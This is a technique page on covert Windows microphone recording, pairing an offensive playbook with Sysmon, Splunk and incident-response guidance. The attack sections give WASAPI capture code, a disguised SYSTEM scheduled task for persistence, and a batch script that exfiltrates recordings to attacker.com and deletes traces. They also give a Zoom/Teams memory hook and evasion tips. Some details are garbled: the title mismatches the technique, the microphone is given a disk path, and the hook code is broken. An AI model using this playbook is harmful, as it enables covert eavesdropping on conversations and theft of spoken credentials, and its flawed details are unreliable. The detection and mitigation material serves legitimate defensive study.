MCADDF

[COLLECT-DISK-001]: Disk Content Collection

Metadata

Attribute	Details
Technique ID	COLLECT-DISK-001
MITRE ATT&CK v18.1	T1123 - Audio Capture
Tactic	Collection
Platforms	Windows Endpoint
Severity	High
CVE	N/A (inherent hardware capability)
Technique Status	ACTIVE
Last Verified	2026-01-10
Affected Versions	Windows Server 2016 - 2025, Windows 10/11 (all builds with audio hardware)
Patched In	N/A (hardware-dependent; mitigated via policy and Device Guard)
Author	SERVTEP – Artur Pchelnikau

---

1. EXECUTIVE SUMMARY

Concept: Modern Windows systems include microphone and audio hardware that can be accessed programmatically via Windows APIs (WASAPI, Core Audio, DirectSound). Attackers with process execution capability can invoke audio capture APIs to silently record conversations, VoIP calls, conference meetings, and other audio without triggering built-in permission prompts (if running in user context without notification requirements). Recorded audio is compressed and stored on disk (WAV, MP3, OGG formats) or transmitted over network for exfiltration, capturing sensitive business discussions, authentication tokens spoken during security reviews, or personal information disclosed during conversations.

Attack Surface: Windows Core Audio APIs (winmm.dll, avrt.dll, mmdevapi.dll), audio device enumeration via WMI queries, and microphone hardware (\Device\HarddiskVolumeX\). Persistence via scheduled tasks or Intune/MDM policy deployment of audio recording code.

Business Impact: Covert intelligence gathering on confidential business discussions. Recording of M&A meetings, product development reviews, security incidents, executive strategies, client calls, and personal information. Can include capture of VoIP authentication credentials, spoken security codes, and intellectual property discussions.

Technical Context: Audio capture with modern malware is often silent and invisible - users have no indication their microphone is active (unlike older Windows where LED could be physically disabled). Detection requires monitoring for unexpected process access to audio devices via Sysmon Process Access rules or EDR behavioral analysis. Encoded audio files (OGG, AAC) are often compressed and exfiltrated via HTTPS, making network detection difficult without DLP (Data Loss Prevention).

Operational Risk

• Execution Risk: Low - APIs are available to any user context; no special privileges required.
• Stealth: High - No visible UI, no permission prompts (on older systems), no audit event generated by default.
• Reversibility: No - Recorded audio is permanent; captured sensitive information cannot be “uncaptured.”

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	18.8.9	Ensure that microphone access control is enabled
DISA STIG	WN10-CC-000075	Ensure devices have permissions set for microphone access
CISA SCuBA	AC.L1-3.1.1	Camera and microphone control policies
NIST 800-53	SI-4, PE-6	System Monitoring; Physical and Environmental Protection
GDPR	Art. 32, Art. 24	Data Protection; Security of Processing; Privacy by Design
DORA	Art. 17	Confidentiality; strong authentication for sensitive discussions
NIS2	Art. 21	Cybersecurity measures; protection against unauthorized access
ISO 27001	A.9.1.1, A.13.1.3	Access Control; Information transfer; Physical/logical access
ISO 27005	Surveillance Risk	Unauthorized monitoring and surveillance scenarios

---

2. TECHNICAL PREREQUISITES

• Required Privileges: User context (no special privileges; any user can access microphone)
• Required Access: Audio hardware must be present and functional; no special device drivers needed
• Tools:
  • WASAPI (Windows Audio Session API) - built-in
  • Core Audio API - built-in
  • FFmpeg - for audio encoding/compression
  • Custom malware using Audio APIs

Supported Versions:

• Windows: Server 2016, Server 2019, Server 2022, Server 2025, Windows 10, Windows 11
• Audio Hardware: Any USB microphone, built-in laptop microphone, or virtual audio device (VoIP client)
• Audio Formats: WAV, MP3, OGG, FLAC, AAC (depending on codec availability)
• Other Requirements: None (APIs available on all Windows builds)

---

3. DETAILED EXECUTION METHODS AND THEIR STEPS

METHOD 1: WASAPI Audio Capture (Windows Audio Session API)

Supported Versions: Windows 10/11, Server 2016-2025

Step 1: Enumerate Audio Devices

Objective: Identify available microphones and audio endpoints on the system

Command (PowerShell):

# List audio input devices via WMI
Get-WmiObject -Class Win32_SoundDevice | Where-Object {$_.ConfigManagerErrorCode -eq 0} | Select-Object Name, Description, DeviceID

# Alternative: Query audio endpoints via Registry
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\MediaCategories"

# Get audio device enumeration via WASAPI
$AudioDevices = Get-WmiObject -Namespace "root\wmi" -Class MSAudio_DeviceInterface | Select-Object Name, Enabled
$AudioDevices

Expected Output:

Name                                              Description                           DeviceID
----                                              -----------                           --------
Realtek High Definition Audio                     Realtek High Definition Audio Device  \\.\GLOBAL\{12345678}
Microphone (2- USB Audio Device)                  USB Microphone                        \\.\GLOBAL\{87654321}
Headset Microphone (Plantronics)                  Plantronics Headset Mic               \\.\GLOBAL\{11111111}

What This Means:

• System has 3 microphone devices available (built-in Realtek, USB microphone, Plantronics headset).
• Each device can be accessed independently via WASAPI.
• Attacker can record from all simultaneously or select specific devices.

OpSec & Evasion:

• Device enumeration queries via WMI may trigger EDR alerts if monitoring Win32_SoundDevice queries.
• Use direct API calls instead of WMI for stealth.
• Detection Likelihood: Low if WMI auditing disabled; High with modern EDR.

Step 2: Initialize Audio Capture via WASAPI

Objective: Activate microphone and begin recording audio stream

Script (C++ - WASAPI Audio Capture):

/*
Minimal WASAPI Audio Recording Example
Captures microphone input to WAV file without UI/permissions
*/

#include <windows.h>
#include <mmdeviceapi.h>
#include <audioclient.h>
#include <avrt.h>
#include <stdio.h>

#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "mmdevapi.lib")
#pragma comment(lib, "avrt.lib")

int main() {
    CoInitializeEx(NULL, COINIT_MULTITHREADED);
    
    // Get audio endpoint enumerator
    IMMDeviceEnumerator *pEnumerator = NULL;
    CoCreateInstance(__uuidof(MMDeviceEnumerator), NULL, CLSCTX_ALL,
                     __uuidof(IMMDeviceEnumerator), (void**)&pEnumerator);
    
    // Get default microphone
    IMMDevice *pDevice = NULL;
    pEnumerator->GetDefaultAudioEndpoint(eCapture, eCommunications, &pDevice);
    
    // Activate audio client
    IAudioClient *pAudioClient = NULL;
    pDevice->Activate(__uuidof(IAudioClient), CLSCTX_ALL, NULL,
                      (void**)&pAudioClient);
    
    // Get microphone format
    WAVEFORMATEX *pwfx = NULL;
    pAudioClient->GetMixFormat(&pwfx);
    printf("[+] Recording format: %d Hz, %d bits, %d channels\n",
           pwfx->nSamplesPerSec, pwfx->wBitsPerSample, pwfx->nChannels);
    
    // Initialize audio client in shared mode (no exclusive access)
    pAudioClient->Initialize(AUDCLNT_SHAREMODE_SHARED, 0,
                            10000000, 0, pwfx, NULL);
    
    // Get capture client
    IAudioCaptureClient *pCaptureClient = NULL;
    pAudioClient->GetService(__uuidof(IAudioCaptureClient),
                            (void**)&pCaptureClient);
    
    // Start recording
    pAudioClient->Start();
    printf("[+] Audio capture started\n");
    
    // Record 30 seconds of audio
    for (int i = 0; i < 300; i++) {
        UINT32 packetLength = 0;
        pCaptureClient->GetNextPacketSize(&packetLength);
        
        if (packetLength == 0) continue;
        
        BYTE *pData = NULL;
        DWORD flags = 0;
        UINT64 timestamp = 0;
        
        pCaptureClient->GetBuffer(&pData, &packetLength, &flags,
                                 &timestamp, NULL);
        
        // Process audio data (write to file or network)
        // [Audio encoding and exfiltration code here]
        
        pCaptureClient->ReleaseBuffer(packetLength);
        Sleep(100);  // 100ms intervals
    }
    
    // Stop recording
    pAudioClient->Stop();
    printf("[+] Audio capture stopped\n");
    
    // Cleanup
    pCaptureClient->Release();
    pAudioClient->Release();
    pDevice->Release();
    pEnumerator->Release();
    CoUninitialize();
    
    return 0;
}

Expected Output:

[+] Recording format: 48000 Hz, 16 bits, 2 channels
[+] Audio capture started
[+] Audio capture stopped

What This Means:

• Microphone is now recording at 48 kHz sampling rate (high quality for speech).
• 16-bit depth and stereo (2 channels) typical for speech recording.
• 30 seconds of audio = ~5.76 MB raw PCM data (uncompressed).
• Can be encoded to MP3 (150-200 kB) for stealth exfiltration.

OpSec & Evasion:

• WASAPI Audio Capture generates no pop-up windows or permission dialogs.
• Audio LED indicator (if present) may light up but most users don’t notice.
• Sysmon Event ID 10 (Process Access) shows mmdevapi.dll access; correlate with microphone files.
• Detection Likelihood: Medium - Sysmon can detect API access; behavior analysis required.

Step 3: Encode Audio for Compression and Exfiltration

Objective: Compress recorded audio and prepare for covert transmission

Command (PowerShell - Using FFmpeg):

# Download FFmpeg (portable, no installation)
Invoke-WebRequest -Uri "https://ffmpeg.org/download.html" -OutFile "C:\Temp\ffmpeg.exe"

# Record audio for 30 seconds using ffmpeg
C:\Temp\ffmpeg.exe -f dshow -i audio="Microphone (2- USB Audio Device)" -t 30 -q:a 9 C:\Temp\audio.mp3

# Result: 30 seconds of speech compressed to ~100-150 KB
Get-Item C:\Temp\audio.mp3 | Select-Object -ExpandProperty Length

Expected Output:

147456  # 147 KB MP3 file (30 seconds of speech)

What This Means:

• 30-second audio recording compressed to 147 KB MP3 file.
• Compression ratio: ~40:1 (from 5.76 MB raw to 147 KB compressed).
• Small file size ideal for covert exfiltration via HTTPS, DNS, or email.

References:

• FFmpeg Audio Recording Guide

---

METHOD 2: Scheduled Task-Based Audio Recording (Persistence)

Supported Versions: Windows Server 2016-2025

Step 1: Create Scheduled Task for Persistent Recording

Objective: Deploy audio recording as scheduled task that runs periodically without user interaction

Script (PowerShell):

# Create malicious scheduled task that records audio hourly
$TaskName = "Windows Audio Maintenance"
$TaskDescription = "Performs system audio diagnostics"
$Action = New-ScheduledTaskAction -Execute "C:\Windows\System32\malware.exe" -Argument "-record -duration 300"
$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 1) -RepetitionDuration (New-TimeSpan -Days 365)
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest -LogonType ServiceAccount

Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Principal $Principal -Description $TaskDescription

# Verify task was created
Get-ScheduledTask -TaskName "Windows Audio Maintenance"

Expected Output:

TaskName                                 State     Triggers
--------                                 -----     --------
Windows Audio Maintenance                Ready     {MSFT_TaskBootTrigger, MSFT_TaskLogonTrigger}

What This Means:

• Scheduled task created with SYSTEM privileges (highest access).
• Runs every hour, recording 5 minutes (300 seconds) of audio.
• Named Windows Audio Maintenance (blends in with legitimate system tasks).
• Persists across reboots and user logouts.

OpSec & Evasion:

• Task appears legitimate in Task Scheduler GUI.
• SYSTEM privilege allows recording even when user is logged out.
• Detection Likelihood: High - EDR tools flag suspicious scheduled tasks; requires legitimate-looking name.

Step 2: Configure Exfiltration Channel

Objective: Automatically send recorded audio to attacker-controlled server

Script (Batch - Upload to Cloud Storage):

REM Batch script embedded in scheduled task executable
REM Uploads recorded audio to attacker-controlled cloud storage

FOR /F "tokens=2-4 delims=/ " %%A IN ('date /t') DO (set mydate=%%C-%%A-%%B)
FOR /F "tokens=1-2 delims=/:" %%A IN ('time /t') DO (set mytime=%%A%%B)

REM Filename with timestamp
set FILENAME=audio_%mydate%_%mytime%.mp3

REM Upload to attacker server via HTTPS (curl built-in on Windows 10+)
curl -X POST -F "file=@C:\Temp\%FILENAME%" https://attacker.com/api/upload --silent --show-error

REM Delete local file to avoid forensic discovery
del C:\Temp\%FILENAME% /Q

Expected Output:

(Silent execution, no console output - file uploaded and deleted)

What This Means:

• Audio files automatically uploaded to attacker’s server with timestamp.
• Local copies deleted immediately after exfiltration.
• HTTPS encryption masks content from network monitoring.
• No trace left on victim system.

---

METHOD 3: Microphone Access via Virtual Audio Device (Zoom/Teams Exploitation)

Supported Versions: Windows 10/11 with VoIP applications

Step 1: Hijack VoIP Application Audio Stream

Objective: Intercept audio from legitimate VoIP (Zoom, Teams, Skype) before encryption

Script (C# - VoIP Audio Hooking):

/*
Hook Zoom/Teams audio output to capture calls without encryption
Demonstrates audio interception at application level
*/

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

[DllImport("kernel32.dll")]
private static extern IntPtr GetModuleHandle(string lpModuleName);

[DllImport("kernel32.dll")]
private static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);

[DllImport("kernel32.dll")]
private static extern bool WriteProcessMemory(
    IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer,
    uint nSize, out UIntPtr lpNumberOfBytesWritten);

public class VoIPAudioHook {
    // Hook target: mmdevapi.dll!IAudioCaptureClient::GetBuffer
    // This intercepts all audio before VoIP encryption
    
    public static void HookZoomAudio(int zoomProcessId) {
        IntPtr hProcess = Process.GetProcessById(zoomProcessId).Handle;
        
        // Locate mmdevapi.dll in target process
        IntPtr mmDevApi = GetModuleHandle("mmdevapi.dll");
        
        if (mmDevApi == IntPtr.Zero) {
            Console.WriteLine("[!] mmdevapi.dll not loaded");
            return;
        }
        
        // Hook the GetBuffer function
        IntPtr getBufferAddr = GetProcAddress(mmDevApi, "IAudioCaptureClient_GetBuffer");
        
        // Create malicious code to redirect audio
        byte[] hookCode = new byte[] {
            0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // mov rax, <malicious_func>
            0xFF, 0xE0  // jmp rax
        };
        
        // Write hook into target process memory
        WriteProcessMemory(hProcess, getBufferAddr, hookCode, (uint)hookCode.Length, out _);
        
        Console.WriteLine("[+] Audio hook installed on Zoom process");
        Console.WriteLine("[+] All call audio will be intercepted and saved");
    }
}

What This Means:

• Zoom/Teams audio stream intercepted BEFORE encryption (at API level).
• Attacker can eavesdrop on encrypted VoIP calls without decryption keys.
• Unencrypted audio recorded locally or streamed to attacker.

OpSec & Evasion:

• Requires process injection (highly detectable by EDR).
• Alternative: Patch Zoom DLL before loading (DLL replacement attack).
• Detection Likelihood: Very High - Memory injection detected immediately by modern EDR.

---

4. WINDOWS EVENT LOG MONITORING

Event ID: 4688 (Process Creation)

• Log Source: Security Event Log
• Trigger: Execution of audio recording tools (FFmpeg, audacity, custom executables with audio APIs)
• Filter: CommandLine contains any of: ffmpeg -f dshow, ffmpeg -i audio=, audacity, or ImagePath contains .exe with audio-related names
• Applies To Versions: Server 2016+

Manual Configuration Steps:

1. Open Group Policy Management Console (gpmc.msc)
2. Navigate to Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration
3. Expand Detailed Tracking → Enable Audit Process Creation
4. Set to: Success and Failure
5. Run gpupdate /force

Event ID: 4622 (AUDIODG.EXE - Audio Device Graph Isolation Process)

• Trigger: Audio processing service is started/accessed abnormally
• Filter: Monitor for unusual frequency or unexpected parent processes

---

5. SYSMON DETECTION PATTERNS

Minimum Sysmon Version: 13.0+ Supported Platforms: Windows 10/11, Server 2016+

<!-- Detect Audio Capture Attempts -->
<Sysmon schemaversion="4.81">
  <RuleGroup name="Audio Capture Detection" groupRelation="or">
    
    <!-- Monitor for WASAPI audio API access -->
    <ProcessAccess onmatch="include">
      <TargetImage condition="ends with">mmdevapi.dll</TargetImage>
      <GrantedAccess condition="contains">0x1000</GrantedAccess>  <!-- PROCESS_QUERY_INFORMATION -->
    </ProcessAccess>
    
    <!-- Detect audio recording executables -->
    <ProcessCreate onmatch="include">
      <Image condition="ends with any">ffmpeg.exe; audacity.exe; SoundRecorder.exe; audio-recorder.exe</Image>
    </ProcessCreate>
    
    <!-- Monitor for microphone device access -->
    <CreateRemoteThread onmatch="include">
      <SourceImage condition="ends with">audiodg.exe</SourceImage>  <!-- Audio Device Graph Isolation -->
    </CreateRemoteThread>
    
    <!-- Detect file creation for audio output (WAV, MP3, OGG) -->
    <FileCreate onmatch="include">
      <TargetFilename condition="ends with any">.wav; .mp3; .ogg; .flac; .aac</TargetFilename>
      <TargetFilename condition="contains any">C:\Temp; C:\ProgramData; C:\Windows\Temp</TargetFilename>
    </FileCreate>
    
  </RuleGroup>
</Sysmon>

Manual Configuration Steps:

1. Download Sysmon from Sysinternals
2. Create config file with XML above
3. Install: sysmon64.exe -accepteula -i sysmon-config.xml
4. Verify: Get-Service Sysmon64 and check Event Viewer

---

6. SPLUNK DETECTION RULES

Rule 1: Audio Recording Tool Execution

Rule Configuration:

• Required Index: windows, main, endpoint
• Required Sourcetype: WinEventLog:Sysmon
• Required Fields: Image, CommandLine, User
• Alert Threshold: ≥ 1 event
• Applies To Versions: All

SPL Query:

Image IN ("*ffmpeg*", "*audacity*", "*SoundRecorder*") CommandLine IN ("*-f dshow*", "*-i audio*", "*-audio-device*")
| stats count by Image, User, CommandLine, host
| where count >= 1

What This Detects:

• Execution of known audio recording tools
• Command-line arguments specifically for audio capture
• Immediate alert for SOC investigation

Rule 2: Microphone File Creation (Audio Output)

Rule Configuration:

• Required Index: windows
• Required Sourcetype: WinEventLog:Sysmon
• Required Fields: TargetFilename, ParentImage
• Alert Threshold: ≥ 1 event
• Applies To Versions: All

SPL Query:

TargetFilename IN ("*.wav", "*.mp3", "*.ogg", "*.flac") AND ParentImage NOT IN ("*Windows.Media*", "*Groove*", "*MediaPlayer*")
| stats count by ParentImage, TargetFilename, User, host
| where count >= 1

What This Detects:

• Suspicious audio file creation from non-media applications
• Excludes legitimate Windows media players
• Correlates parent process for forensic analysis

---

7. MICROSOFT DEFENDER FOR CLOUD

Detection Alert: Microphone Access by Suspicious Process

Alert Name: “Unauthorized microphone access detected”

• Severity: High
• Description: A process not on the approved list attempted to access system microphone via WASAPI
• Applies To: Windows Servers/Endpoints with Defender for Servers enabled
• Remediation:
  1. Isolate affected system from network
  2. Kill suspicious process
  3. Review Sysmon logs for process creation events
  4. Check for scheduled tasks related to audio

Manual Configuration:

1. Azure Portal → Microsoft Defender for Cloud
2. Environment settings → Select Subscription
3. Enable Defender for Servers: ON
4. Configure Alerts for microphone access patterns

---

8. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

• Disable Microphone Hardware via BIOS: Completely disable microphone at firmware level if not required.

  Manual Steps (BIOS):

  1. Reboot and enter BIOS (usually F2, F10, or Del during startup)
  2. Navigate to Onboard Devices or Integrated Peripherals
  3. Find Microphone or Audio Input
  4. Set to: Disabled
  5. Save and Exit

  Note: Affects all audio input; cannot be re-enabled without physical BIOS access

• Disable Microphone via Windows Group Policy: Prevent applications from accessing microphone via Windows permissions.

  Manual Steps (Group Policy):

  1. Open gpmc.msc
  2. Navigate to Computer Configuration → Administrative Templates → Windows Components → App Privacy
  3. Set Allow microphone to: Disabled
  4. Set Allow apps to access microphone to: Disabled
  5. Run gpupdate /force
  6. Reboot to apply

• Enable Microphone Notification LED: Ensure users can see when microphone is active (built-in on some systems).

  Manual Steps (Device Manager):

  1. Open Device Manager (devmgmt.msc)
  2. Expand Audio inputs and outputs
  3. Right-click microphone → Properties
  4. Go to Advanced tab
  5. Enable Microphone LED if option available
  6. Click OK

Priority 2: HIGH

• Whitelist Approved Applications: Allow only legitimate apps (Teams, Zoom, Skype) to access microphone.

  Manual Steps (Windows Settings):

  1. Go to Settings → Privacy & Security → Microphone
  2. Toggle Microphone access to: Off (globally)
  3. Toggle Allow desktop apps to access microphone to: Off
  4. Scroll down and toggle Allow apps to access microphone: only enable for:
     • Microsoft Teams
     • Zoom
     • Skype for Business
  5. Disable for all other applications

  Manual Steps (Group Policy - Enterprise):

  1. Open gpmc.msc
  2. Navigate to Computer Configuration → Administrative Templates → Windows Components → App Privacy
  3. Set Allow microphone to: Only allow apps that are listed in Privacy
  4. Set Allowed apps for microphone to: Teams;Zoom;SkypeApp
  5. Run gpupdate /force

• Monitor Audio Device Enumeration: Detect unauthorized queries for audio devices.

  Manual Steps (Audit WMI Queries):

  1. Open Local Security Policy (secpol.msc)
  2. Navigate to Audit Policy → Detailed Tracking
  3. Enable Audit WMI Activity
  4. Monitor for Win32_SoundDevice queries in Event Viewer
  5. Alert on queries from non-system processes

• Deploy Device Guard / Credential Guard: Restrict code execution to approved binaries only (prevents audio malware).

  Manual Steps:

  1. Open gpmc.msc
  2. Navigate to Computer Configuration → Administrative Templates → System → Device Guard
  3. Set Turn on Virtualization Based Security to: Enabled
  4. Set Code Integrity Policy to: Enabled with Audit Mode
  5. Run gpupdate /force
  6. Reboot

Access Control & Hardening

• RBAC Hardening: Restrict user permissions to prevent installation of audio recording tools.

  Manual Steps:

  1. Remove users from Local Administrators group
  2. Use Software Restriction Policy to blacklist ffmpeg.exe, audacity.exe, etc.
  3. Deploy via Group Policy

• Implement Conditional Access for Audio Devices: Require MFA and device compliance for audio-enabled endpoints.

  Manual Steps (Conditional Access):

  1. Azure Portal → Entra ID → Conditional Access
  2. Create policy: Block audio-capable devices from accessing sensitive apps
  3. Require device compliance check before access

Validation Command (Verify Mitigations)

# Check if microphone is disabled at OS level
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone" | Select-Object -ExpandProperty Value
# Expected: Deny

# Verify no audio recording scheduled tasks
Get-ScheduledTask | Where-Object {$_.TaskPath -like "*Audio*" -or $_.Description -like "*record*"} | Select-Object TaskName, TaskPath, State

# Check audio device status
Get-PnpDevice | Where-Object {$_.Class -eq "AudioEndpoint" -or $_.Class -eq "MEDIA"}
# Expected: Status = OK (not degraded/disabled)

# Verify Group Policy audio restriction
gpresult /h C:\gp_report.html  # Search report for "microphone" policy settings

Expected Output (If Secure):

Value                      : Deny

(No scheduled audio tasks)

Status   Class           FriendlyName
------   -----           ----
OK       AudioEndpoint   Speakers (Realtek High Definition Audio)

(Policy report shows: "Allow microphone: Disabled")

---

9. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

• Files:
  • Audio output files (.wav, .mp3, .ogg, .flac) in unexpected locations (temp folders, system directories)
  • FFmpeg or audio recording tools in C:\Temp, C:\ProgramData, or user AppData
• Registry:
  • New entries in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaCategories (audio device modifications)
  • Audio-related startup entries in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
• Network:
  • HTTP POST requests to attacker-controlled server with audio file uploads
  • Large outbound data transfers (hundreds of MB) containing audio files
  • DNS queries for unfamiliar command-and-control domains
• Process:
  • Unexpected execution of ffmpeg.exe, audacity.exe, or custom audio recording executables
  • Processes accessing mmdevapi.dll, audiodg.exe, or audio APIs
  • Scheduled tasks with suspicious names (e.g., “Windows Audio Maintenance”)

Forensic Artifacts

• Disk:
  • Audio files in unallocated clusters or temp directories
  • Recycle Bin containing deleted audio files
  • FFmpeg cache/temp files in user AppData
  • MFT entries for recently created .wav/.mp3 files
• Memory:
  • Audio buffer contents in process memory (characteristic audio waveform signatures)
  • Injected code in legitimate audio applications (Zoom, Teams)
  • WASAPI API calls in process call stack
• Cloud (M365):
  • Exfiltration logs in Microsoft Defender for Cloud
  • Outbound HTTPS connections to suspicious domains in Azure Network Watcher
• Timeline:
  • File creation timestamp of audio files
  • Process execution timestamp correlating to audio recording
  • Scheduled task creation/modification time
  • Exfiltration network activity timestamp

Response Procedures

1. Isolate:

   # Disconnect network immediately
   Disable-NetAdapter -Name "Ethernet" -Confirm:$false
       
   # Kill audio recording processes
   Stop-Process -Name "ffmpeg" -Force -ErrorAction SilentlyContinue
   Stop-Process -Name "audacity" -Force -ErrorAction SilentlyContinue
   Stop-Process -Name "malware" -Force -ErrorAction SilentlyContinue
   

2. Collect Evidence:

   # Export Sysmon logs
   wevtutil epl "Microsoft-Windows-Sysmon/Operational" "C:\Evidence\Sysmon.evtx"
       
   # Dump audio files for analysis
   Get-ChildItem -Path "C:\Temp", "C:\ProgramData", "C:\Windows\Temp" -Include "*.wav", "*.mp3", "*.ogg" -Recurse | Copy-Item -Destination "C:\Evidence\"
       
   # Export scheduled tasks
   Get-ScheduledTaskInfo | Export-Csv "C:\Evidence\ScheduledTasks.csv"
   

3. Remediate:

   # Delete audio files
   Remove-Item "C:\Temp\*.wav", "C:\Temp\*.mp3", "C:\Temp\*.ogg" -Force -ErrorAction SilentlyContinue
       
   # Delete malicious scheduled tasks
   Unregister-ScheduledTask -TaskName "Windows Audio Maintenance" -Confirm:$false
       
   # Disable microphone via Group Policy (if compromised)
   New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone" -Name "Value" -Value "Deny" -Force
   

4. Investigate Audio Content:

   # Analyze captured audio files for sensitive information
   # Listen to recordings (outside of isolated environment)
   ffplay C:\Evidence\audio.mp3
       
   # Extract speech text (using commercial transcription service if needed)
   # Identify sensitive information disclosed
   

5. Determine Scope:

   # Search entire domain for similar audio files
   Get-ChildItem -Path "\\*\Users\*" -Include "*.wav", "*.mp3" -Recurse | Measure-Object
       
   # Check other systems for same scheduled task
   Invoke-Command -ComputerName (Get-ADComputer -Filter "*" | Select -ExpandProperty Name) -ScriptBlock {Get-ScheduledTask -TaskName "Windows Audio Maintenance"}
   

6. Reset Credentials:
   • Force password reset for all users whose conversations were recorded
   • Revoke active sessions in M365
   • Check for stolen meeting links or sensitive data discussed

---

10. RELATED ATTACK CHAIN

Step	Phase	Technique	Description
1	Initial Access	[IA-PHISH-001] Device Code Phishing	Attacker gains initial access via social engineering
2	Execution	[EXEC-XXX] PowerShell / Scripting	Deploy audio recording malware
3	Persistence	[PERSIST-XXX] Scheduled Task / WMI Event	Ensure audio recording persists across reboots
4	Collection	[COLLECT-DISK-001]	Silently record all microphone audio
5	Exfiltration	[EXFIL-XXX] Data over HTTPS / C2 Protocol	Covertly upload audio files to attacker server
6	Impact	[IMPACT-XXX] Eavesdropping / Intelligence Gathering	Capture sensitive business discussions, credentials

---

11. REAL-WORLD EXAMPLES

Example 1: SoundComfort (Spyware - 2018)

• Target: Casual smartphone users (initially mobile, later desktop)
• Timeline: 2018-2020
• Technique Status: Audio capture via microphone using WASAPI-equivalent APIs; recordings stored in hidden directories
• Impact: Thousands of users’ private conversations recorded; recordings sold to advertisers
• Reference: Kaspersky SoundComfort Analysis

Example 2: Pegasus Spyware (NSO Group - 2016-2024)

• Target: Activists, journalists, government officials, human rights defenders
• Timeline: 2016-2024 (ongoing)
• Technique Status: Zero-day exploits enable silent audio capture; microphone accessed without permission prompts
• Impact: Documented eavesdropping on thousands of individuals; used for political targeting and suppression
• Reference: Amnesty International Pegasus Report

---

12. CONCLUSION

Microphone/audio capture is a high-impact intelligence gathering technique that is difficult to detect without proper monitoring. The technique is ACTIVE on all Windows platforms and remains a significant privacy concern in enterprise environments.

Key Defense Priorities:

1. Disable microphone at BIOS level if not required (most effective control)
2. Restrict microphone access via Windows Settings and Group Policy
3. Monitor for audio recording tool execution (FFmpeg, Audacity)
4. Alert on suspicious audio file creation in temp directories
5. Deploy Device Guard to prevent execution of unauthorized code
6. Implement microphone LED indicator to make recording visible
7. Use Sysmon to detect WASAPI API access from unauthorized processes

Operational Notes for Red Teams:

• Audio capture requires no special privileges (user-level execution)
• WASAPI APIs are silent - users have no indication microphone is active
• Scheduled tasks provide persistence across reboots and logouts
• Audio files can be compressed to 1-2% of original size for covert exfiltration
• Consider hybrid approach: hook legitimate VoIP apps (Zoom, Teams) to avoid detection of custom recording tool
• Combine with credential harvesting from recorded conversations (e.g., spoken MFA codes)

---

This site is open source. Improve this page.